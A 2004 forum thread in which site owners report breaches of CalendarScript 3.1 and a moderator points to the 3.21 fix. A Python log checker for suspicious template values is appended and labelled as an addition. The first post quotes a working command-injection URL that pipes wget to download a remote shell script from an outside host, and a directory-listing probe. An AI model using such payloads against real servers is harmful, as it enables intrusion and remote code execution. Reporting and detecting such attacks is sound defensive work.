Author Topic: security issue  (Read 406 times)
oldwest
Guest
« on: June 28, 2004, 12:53:00 PM »

Our site was breached via the calendar script, using a URL like:

calendar.pl?command=login&fromTemplate=|wget%20thehackerssite.ru/cgitelnet.pl%20%3E%3E%20cgitel.pl|

I patched the code to email me when someone tries this now; I see attempts like 'calendar.pl?command=login&fromTemplate=|ls%20-al|' get emailed to me still.

I have heavily modified Version: 3.1 and I would rather not have to patch in all the changes into the new version if I don't have to.

Did this security issue get addressed in the new version of CalendarScript?

In case it hasn't been patched yet in the new version I wanted to make sure it's known.

oldwest
Guest
« Reply #1 on: June 28, 2004, 12:57:00 PM »

PS:

I think it's script kiddies that are attacking the site, searching engines for calendar script sites just for fun. There have been a number of separate attacks that have tried to get data that the first attacker already had.

This gives me the impression it's multiple people who are not working together at all.

DanO
Moderator
« Reply #2 on: June 28, 2004, 05:51:00 PM »

** Our site was breached via the calendar script **

CalendarScript version 3.21 came out to correct such vulnerabilities.

** I have heavily modified Version: 3.1 and I would rather not have to patch in all the changes into the new version if I don't have to. **

If you contact Matt via email he may be able to tell you the specific areas of the calendar file(s) which need changing. Other than that all I can think is you could compare the current release files with unmodified files of the version you are using to try to find where the changes are.

Dan O.


------------------

[This message has been edited by DanO (edited June 28, 2004).]

Trisha
Guest
« Reply #3 on: July 03, 2004, 02:46:00 PM »

Our site was breached as well today.. and there is at least one page out there that tells how to do it.. through calendarscript...

I hesitate to post the url, though.

trisha

DanO
Moderator
« Reply #4 on: July 03, 2004, 04:49:00 PM »

** I hesitate to post the url **

Then maybe email it to Matt so he can see if he can do anything about it.

JMO

Dan O.

------------------
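
The log check below is an added example, not part of the original thread and not CalendarScript code: it URL-decodes the fromTemplate parameter seen in the URLs quoted in the first post and flags any value that is not a plain file name. The log lines, the template name default.html and the allowlist pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate template name is a plain file name
# (letters, digits, "_" and "-", optionally dot-separated extensions).
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*")

# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+)')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jun/2004:12:01:00 +0000] "GET /cgi-bin/calendar.pl'
    '?command=login&fromTemplate=default.html HTTP/1.0" 200 5120',
    '198.51.100.7 - - [28/Jun/2004:12:05:13 +0000] "GET /cgi-bin/calendar.pl'
    '?command=login&fromTemplate=|ls%20-al| HTTP/1.0" 200 812',
    # Same probe with the pipes percent-encoded: only visible after decoding.
    '203.0.113.5 - - [28/Jun/2004:12:09:40 +0000] "GET /cgi-bin/calendar.pl'
    '?command=login&fromTemplate=%7Cls%20-al%7C HTTP/1.0" 200 812',
    '192.0.2.44 - - [28/Jun/2004:12:11:02 +0000] "GET /cgi-bin/calendar.pl'
    '?command=view HTTP/1.0" 200 4096',
]


def is_safe_template(value):
    """True only if the whole decoded value matches the allowlist."""
    return SAFE_TEMPLATE.fullmatch(value) is not None


def suspicious_requests(lines, param="fromTemplate"):
    """Return (client, decoded_value) for each request whose param fails the allowlist."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        # parse_qs percent-decodes, so "|" and "%7C" are compared alike.
        for value in parse_qs(urlsplit(target).query).get(param, []):
            if not is_safe_template(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: rejected fromTemplate value {value!r}")
```

The same allowlist test, applied to the parameter inside the script before it is used, refuses the request instead of only reporting it.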
